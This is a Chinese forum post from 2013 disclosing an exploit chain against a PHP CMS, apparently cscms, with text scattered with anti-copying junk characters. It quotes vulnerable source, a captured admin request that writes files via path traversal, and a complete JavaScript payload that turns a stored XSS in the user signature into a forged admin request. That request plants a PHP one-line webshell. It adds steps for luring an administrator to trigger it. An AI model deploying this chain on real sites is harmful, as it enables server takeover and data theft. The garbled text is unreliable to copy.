|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题, @9 k! _8 g- S
官网已经修补了,所以重新下了源码
6 _- I% d8 N. h4 z0 I因为 后台登入 还需要认证码 所以 注入就没看了。* I2 Q7 O. K! f3 {: d% h
存在 xss8 l$ I% f/ g) n
漏洞文件 user/member/skin_edit.php) k& p- x# O, ?+ L& R4 M; S/ I
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:( \! K0 O/ P+ Z
0 x- t% n- M3 ~! R/ e9 |</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
( |8 H4 H, T# g* `
5 N! E6 u3 }, i% D# b/ b- F</textarea></td></tr>
. N9 ^7 X' E+ f
) \/ q) ^, Y$ i* m user/do.php
+ o: ^' b1 _8 n& j& K
% ?$ }: \; C) p I* G2 q7 m @* R; e! l) \- m; k" P
if($op=='zl'){ //资料( Z8 g& ^; p; K* d% j" o
7 \6 d* t) A7 @# \! O if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ' X/ r, X8 V& d; Y" l6 r
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));1 O# U1 g7 z: |: U* x ^* T' W. L: v
3 c; T. g& U9 Y
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',6 N+ `/ Q. H$ I6 |' r
- C7 d& o E2 f9 c! W* V
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
0 v, C( N: K9 C O2 L- v where CS_Name='".$cscms_name."'";
5 ]' d2 G9 P9 z- i8 m
/ @$ \) H; ^$ Y* m: _$ s3 j1 W4 E if($db->query($sql)){1 \ U, l8 {$ R5 x2 ~2 J
7 Z/ a. e0 [5 |" P3 }8 o exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
* } S0 M) X2 m2 H8 P ( u4 R: r( o6 B# O9 v8 l, q( X& `: O, x
}else{
, N( A1 G: V9 f( N4 K
4 S3 f1 l" }; r" R# i exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));" ^3 L- y( o/ b* o) t
% W9 p9 d3 U4 J' t) P- v }
: d* F6 o$ H; z, O: f
* k3 B( k, o$ Q) P# s; g, i' H7 g0 ] }- c" M
没有 过滤导致xss产生。+ ~# Y3 S9 x# ^7 l: Z. S1 m
后台 看了下 很奇葩的是可以写任意格式文件。。9 L) z3 k0 e/ g- s4 _1 Z
抓包。。
$ Q- {7 P5 e3 z- r- @
0 J) L6 N1 r. J. L
1 [' h; r5 D% ]本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
& N- [; Q; v Z" O # C! @+ v8 r4 d |6 K0 o# Y
Accept: text/html, application/xhtml+xml, */*
& V+ p* P! Q8 f4 { _) K& g
8 d% u, c R: a* V( ?& w5 O+ [Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php# q5 h0 E0 i4 d
; i8 \5 c' S% A/ Z0 o. p
Accept-Language: zh-CN5 ]1 U% d5 a: v& E6 ` n9 x1 j# `
3 g' n" g( E# b$ E! I" uUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
: S" t0 ]$ m: E% e1 _/ m8 @; z . v6 ]4 V; F4 F
Content-Type: application/x-www-form-urlencoded
p. I \5 J! j
% k1 I# A9 f0 c8 q9 _0 j5 ^1 W' G& HAccept-Encoding: gzip, deflate# F5 [8 m3 \6 f, I9 P/ v. O
4 Q; M7 q8 L: h7 `8 a2 yHost: 127.0.0.13 e; `. Q1 w! s/ {' i* X
4 X+ K# [0 W" D1 R5 wContent-Length: 38( R9 s. e: ?& F1 @0 ~
0 [3 D" [5 c& L# R. x- FDNT: 1' M/ l2 Q/ |% e' y+ }
+ j* s1 R2 b' `Connection: Keep-Alive
8 O2 \0 H8 F' h9 b% \3 t
$ D+ ~# d/ J" v0 RCache-Control: no-cache
$ X, e% B3 v/ N! d. p9 Q- f5 V/ o
0 r# \0 @9 [5 k+ ~6 y' }Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655940 b2 o$ ~ \2 D2 f m
) w+ f. z9 \- `* N; r* J) B" f
0 ~& P& S6 L, r9 ]0 @7 j
name=aaa.php&content=%3Cs%3E%3Ca%25%3E4 l5 A0 N/ I* i1 \( ^
# N% }9 s6 @' ]- \- N2 |7 E) }1 s# P" _
0 b; X2 X4 o8 H8 J# K于是 构造js如下。
# A0 x+ \* j3 k& ^, ~+ E! r, Q+ V$ ?0 M3 F/ U4 e
本帖隐藏的内容<script> 2 X/ S/ |" ?& o1 Z
thisTHost = top.location.hostname;
7 A, n! t: ?( Z2 s9 t1 J, E
7 J4 s4 Q- S; }) v9 x/ RthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";* d/ U* `) d/ \0 Y
2 W# e7 q2 h9 g; |8 m( r4 z
function PostSubmit(url, data, msg) { 6 K( O8 y2 _2 E8 V; a$ ?
var postUrl = url;
+ |/ _+ j# J) k0 U: i
- x4 q2 b l+ y! ]+ K var postData = data;
" I/ ~) a( f: m8 F$ _6 L. [ var msgData = msg; ( Z6 I( F! o1 r+ k$ A, M
var ExportForm = document.createElement("FORM"); 4 a" x: v8 s0 D2 s+ Y x
document.body.appendChild(ExportForm); % P) a# m3 S: q3 y% \! e; O# g
ExportForm.method = "POST";
/ v4 j9 r( e) r var newElement = document.createElement("input"); 3 x5 _4 m- |; l5 f
newElement.setAttribute("name", "name"); 0 }4 `. S4 G ^' v6 @8 S
newElement.setAttribute("type", "hidden");
9 l+ ~2 h' l0 @6 ]' P var newElement2 = document.createElement("input"); : ]$ d3 p. u% w4 N0 n% W
newElement2.setAttribute("name", "content"); ( C" {0 I2 h, i& H
newElement2.setAttribute("type", "hidden"); 0 [$ Q1 U& ` W9 ~- U
ExportForm.appendChild(newElement); ) f/ R. m" G- S& v/ i: M* v/ B
ExportForm.appendChild(newElement2);
. c% p9 w# n2 f9 S% h+ w newElement.value = postData;
! H+ j. W. c- ^4 y, f' y6 t newElement2.value = msgData; - o7 f& ]0 o% q4 {
ExportForm.action = postUrl;
) S, t( D+ h3 T ExportForm.submit();
3 @# z* K' D# ?! y8 [};
|! l- q) W5 D; o9 b) e; H ' Q9 F2 s; F2 n! Y! \
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ T* r- S% R/ @" T# j# _
6 C" N! L b3 B) v0 c+ y- ?: X</script>
$ ^8 U0 [* f! O1 e3 V( X+ @0 G; s7 d8 C! D! @
- q5 R! U& U7 |) V, j' A& f5 ^; G1 R- s) V( ^3 [
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
, u( \4 b6 a0 h2 p2 A# U! i2 s/ ]用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)" M. G$ M6 R, @1 }6 [6 ^8 Z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
- m7 H# b: O, v, w3 c
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对